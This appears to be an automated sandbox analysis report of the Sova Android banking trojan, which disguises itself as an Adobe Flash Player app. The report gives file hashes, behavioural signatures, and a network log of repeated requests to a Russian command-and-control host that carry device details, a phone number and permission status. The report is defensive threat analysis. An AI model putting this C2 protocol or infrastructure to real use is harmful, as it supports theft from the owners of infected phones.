Resubmissions

24/04/2024, 11:50 UTC

240424-nzl72ahe3w 10

12/04/2024, 13:59 UTC

240412-ravpnaah86 10

28/02/2024, 13:25 UTC

240228-qnw9zacf2t 8

28/02/2024, 12:56 UTC

240228-p6fjhacb22 10

19/02/2024, 08:01 UTC

240219-jw15kaba7y 10

03/01/2024, 08:46 UTC

240103-kpajpscdcp 10

Analysis

  • max time kernel
    120s
  • max time network
    103s
  • platform
    android_x64
  • resource
    android-x64-20231215-en
  • resource tags
    android, arch:x64, arch:x86, image:android-x64-20231215-en, locale:en-us, os:android-10-x64, system
  • submitted
    19/02/2024, 08:01 UTC

General

  • Target

    sova.apk

  • Size

    569KB

  • MD5

    01b6f0220794476fe19a54c049600ab3

  • SHA1

    eb9dfde47a393bca666e947f285f16c20baf6c32

  • SHA256

    8a6889610a18296e812fabd0a4ceb8b75caadc5cec1b39e8173c3e0093fd3a57

  • SHA512

    ac3031a6dbc5bb0d1e609979336487f14efe58f8e87480e5ef7f79c2abae56977ca444bbb5bbc7970d9c416f9c754b9fedf2bdef3b7b311c2e95e07350f9c892

  • SSDEEP

    12288:C89uYjYV1jiNQ7l5DFQo2d8GmEFDipRdWp8+iZiZ5t:9jYniCF6d8iiXg825t

Malware Config

Signatures

  • Sova

    Android banker first seen in July 2021.

  • Makes use of the framework's Accessibility service 2 IoCs

    Retrieves information displayed on the phone screen using AccessibilityService.

  • Removes its main activity from the application launcher 1 IoCs
  • Acquires the wake lock 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

Processes

  • com.adobe.flashplayer
    • Makes use of the framework's Accessibility service
    • Removes its main activity from the application launcher
    • Acquires the wake lock
    PID:5103

Network

  • US
    DNS
    api.ipify.org
    Remote address:
    1.1.1.1:53
    Request
    api.ipify.org
    IN A
    Response
    api.ipify.org
    IN A
    104.26.12.205
    api.ipify.org
    IN A
    172.67.74.152
    api.ipify.org
    IN A
    104.26.13.205
  • US
    GET
    https://api.ipify.org/
    Remote address:
    104.26.12.205:443
    Request
    GET / HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: api.ipify.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: keep-alive
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 857cfcc359ef63cb-LHR
  • US
    DNS
    a0545193.xsph.ru
    Remote address:
    1.1.1.1:53
    Request
    a0545193.xsph.ru
    IN A
    Response
    a0545193.xsph.ru
    IN A
    141.8.197.42
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • US
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    142.250.200.8
  • RU
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:25 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=perms&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=perms&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:25 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • US
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.200.14
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:54 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • US
    DNS
    g.tenor.com
    Remote address:
    1.1.1.1:53
    Request
    g.tenor.com
    IN A
    Response
    g.tenor.com
    IN CNAME
    tenor.googleapis.com
    tenor.googleapis.com
    IN A
    172.217.169.74
    tenor.googleapis.com
    IN A
    142.250.200.10
    tenor.googleapis.com
    IN A
    216.58.204.74
    tenor.googleapis.com
    IN A
    142.250.180.10
    tenor.googleapis.com
    IN A
    216.58.212.234
    tenor.googleapis.com
    IN A
    216.58.201.106
    tenor.googleapis.com
    IN A
    142.250.179.234
    tenor.googleapis.com
    IN A
    172.217.169.10
    tenor.googleapis.com
    IN A
    142.250.187.202
    tenor.googleapis.com
    IN A
    142.250.187.234
    tenor.googleapis.com
    IN A
    216.58.213.10
    tenor.googleapis.com
    IN A
    142.250.178.10
    tenor.googleapis.com
    IN A
    172.217.16.234
    tenor.googleapis.com
    IN A
    142.250.200.42
    tenor.googleapis.com
    IN A
    216.58.212.202
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:23 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:23 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • RU
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • 104.26.12.205:443
    https://api.ipify.org/
    tls, http
    1.2kB
    6.3kB
    9
    9

    HTTP Request

    GET https://api.ipify.org/

    HTTP Response

    200
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C
    http
    607 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030
    http
    453 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030

    HTTP Response

    400
  • 142.250.200.8:443
    ssl.google-analytics.com
    tls
    1.3kB
    6.1kB
    8
    9
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=perms&value=1
    http
    444 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=perms&value=1

    HTTP Response

    400
  • 172.217.16.238:443
    tls, https
    857 B
    40 B
    1
    1
  • 142.250.200.14:443
    android.apis.google.com
    tls
    2.8kB
    7.1kB
    11
    16
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1
    http
    452 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1

    HTTP Response

    400
  • 142.250.187.228:443
    tls, https
    430 B
    40 B
    2
    1
  • 142.250.187.228:443
    www.google.com
    tls
    8.5kB
    12.2kB
    26
    38
  • 172.217.169.74:443
    g.tenor.com
    tls
    1.7kB
    8.1kB
    11
    13
  • 216.58.213.14:443
    468 B
    9
  • 172.217.16.226:443
    468 B
    9
  • 216.58.201.106:443
    g.tenor.com
    468 B
    9
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
    571 B
    5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 224.0.0.251:5353
    3.3kB
    10
  • 1.1.1.1:53
    api.ipify.org
    dns
    59 B
    107 B
    1
    1

    DNS Request

    api.ipify.org

    DNS Response

    104.26.12.205
    172.67.74.152
    104.26.13.205

  • 1.1.1.1:53
    a0545193.xsph.ru
    dns
    62 B
    78 B
    1
    1

    DNS Request

    a0545193.xsph.ru

    DNS Response

    141.8.197.42

  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
    86 B
    1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    142.250.200.8

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
    109 B
    1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.200.14

  • 1.1.1.1:53
    g.tenor.com
    dns
    57 B
    328 B
    1
    1

    DNS Request

    g.tenor.com

    DNS Response

    172.217.169.74
    142.250.200.10
    216.58.204.74
    142.250.180.10
    216.58.212.234
    216.58.201.106
    142.250.179.234
    172.217.169.10
    142.250.187.202
    142.250.187.234
    216.58.213.10
    142.250.178.10
    172.217.16.234
    142.250.200.42
    216.58.212.202

MITRE ATT&CK Matrix

Downloads
